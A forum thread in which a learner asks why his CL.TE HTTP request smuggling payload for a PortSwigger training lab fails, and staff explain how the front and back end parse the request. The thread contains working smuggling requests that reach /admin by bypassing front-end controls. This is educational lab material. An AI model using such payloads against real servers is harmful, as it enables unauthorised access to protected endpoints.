Burp Suite User Forum

Create new post

HTTP request Smuggling CL.TE LAB

Giacomo | Last updated: Jan 14, 2023 03:05PM UTC

Hi, I'm trying to solve the lab "Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability". I tried using the following request : ---- POST / HTTP/1.1 Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net Content-Type: application/x-www-form-urlencoded Connection: closed Content-Length: 64 Transfer-Encoding: chunked 0 3c GET /admin HTTP/1.1 Host: localhost Connection: closed ---- Unfortunately I receive the error "Protocol error", could you please help me to understand why? I checked the lab solution, but honestly it is not clear to me the first HTTP request reported. It is not present the chunk length of the second chunk (smuggled one) Thanks in advance for the support.

Pablo | Last updated: Jan 15, 2023 07:39PM UTC

GET /admin HTTP/1.1

Giacomo | Last updated: Jan 16, 2023 08:16AM UTC

sorry but I didn't get it, I have the same line in the request I posted, but it is not working.

Michelle, PortSwigger Agent | Last updated: Jan 16, 2023 11:22AM UTC

Have you tried comparing the request you are sending with those suggested in the lab solution or the community videos and also check for smaller details such as where you are adding new lines?

Giacomo | Last updated: Jan 16, 2023 06:21PM UTC

I'm trying to compare the two requests (mine and the one reported in the lab solution). What I do not understand is the syntax of the request reported in the lab solution : POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 54 Transfer-Encoding: chunked 0 GET /admin HTTP/1.1 Host: localhost X-Ignore: X before "GET /admin HTTP/1.1" it is not present the bytes chunk length which if I understood correctly should be required as chunk syntax. Could you kindly help me to understand please ?

Ben, PortSwigger Agent | Last updated: Jan 18, 2023 10:44AM UTC

Hi, Have you read the learning material for request smuggling (the basics are detailed on the page below): https://portswigger.net/web-security/request-smuggling On a general note, in CL.TE labs, the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. In the request that you have highlighted, the front-end server processes the Content-Length header and determines that the body is 54 bytes long, up to the end of 'X-Ignore: X'. This request is then forwarded onto the back-end server. The back-end server processes the Transfer-Encoding header, and so treats the message body as using chunked encoding. It processes the first chunk, which is stated to be zero length, and so is treated as terminating the request. The entirety of the 'GET /admin HTTP/1.1.....' request is left unprocessed, and the back-end server will treat this as being the start of the next request in the sequence.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.